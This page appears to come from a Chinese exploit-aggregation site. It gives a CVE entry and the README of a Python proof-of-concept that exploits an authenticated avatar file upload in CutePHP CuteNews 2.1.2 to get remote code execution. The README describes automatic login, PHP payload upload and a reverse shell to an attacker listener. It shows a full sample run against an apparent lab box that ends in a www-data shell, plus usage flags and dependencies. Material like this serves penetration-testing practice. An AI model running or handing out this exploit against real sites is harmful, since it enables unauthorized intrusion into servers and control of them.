关联漏洞
标题:
编号重复
(CVE-2019-11447)
描述:CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访问控制、备份和恢复等功能。 “废弃”请勿使用此编号。原因:此编号与CNNVD-201110-126编号重复,所有使用CNNVD编号的用户请参考CNNVD-201110-126编号。为防止意外使用,此编号中的所有信息已删除。
描述
CutePHP Cute News 2.1.2 RCE PoC
介绍
# CVE-2019-11447
## CutePHP Cute News 2.1.2 RCE PoC
**Target :** 2.1.2
This PoC script is based on a simple implementation of the original exploit by **BobbySox**. The original exploit is an MSF module by **Akuss**.
This script needs the target ip address or domain along with credentials and it will automatically login, upload payload, trigger it and catch the reverse shell.
```
python cve-2019-11447.py -t 10.10.10.206 -u twh -p p4ssw0rd -lh 10.10.16.2 -lp 4444 -f shell
--------------------------------------
--- CVE-2019-11447 -------------------
--- CuteNews Arbitrary File Upload ---
--- CutePHP CuteNews 2.1.2 -----------
--------------------------------------
[>] Found By : Akkus [ https://twitter.com/ehakkus ]
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.10.206/CuteNews/index.php
[>] Username : twh
[>] Password : p4ssw0rd
[!] Logging in...
[+] Logged In!
[+] Loading Profile...
[+] Searching Signatures...
[!] Uploading Payload...
[+] Loading Profile...
[+] Searching Avatar URL...
[*] URL : http://passage.htb/CuteNews/uploads/avatar_twh_shell.php
[!] Payload will trigger in 5 seconds...
[!] Starting Listner...
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.206 on port 35196
[*] Switching to interactive mode
bash: cannot set terminal process group (1656): Inappropriate ioctl for device
bash: no job control in this shell
www-data@passage:/var/www/html/CuteNews/uploads$ $ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ $
```
## Dependencies
```
pip3 install requests bs4 pwntools
```
## Usage
```
python cve-2019-11447.py -h
usage: cve-2019-11447.py [-h] [-t TARGET] [-u UNAME] [-p PASSW] [-lh LHOST] [-lp LPORT] [-f FILE]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET Target IP address or domain
-u UNAME, --uname UNAME Username
-p PASSW, --passw PASSW Password
-lh LHOST, --lhost LHOST Listener IP address
-lp LPORT, --lport LPORT Listener Port
-f FILE, --file FILE Filename for payload WITHOUT extension
```
## Credits
* Thank you **Akuss** for discovering this vulnerability
* https://www.exploit-db.com/exploits/46698/
* Thank you **BobbySox** for implementing it in a simple way
* https://github.com/kyle41111/CuteScript
文件快照
[4.0K] /data/pocs/a5d6ec99007abc086abcbeac33eb4c39c3cfb94f
├── [4.9K] cve-2019-11447.py
└── [2.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。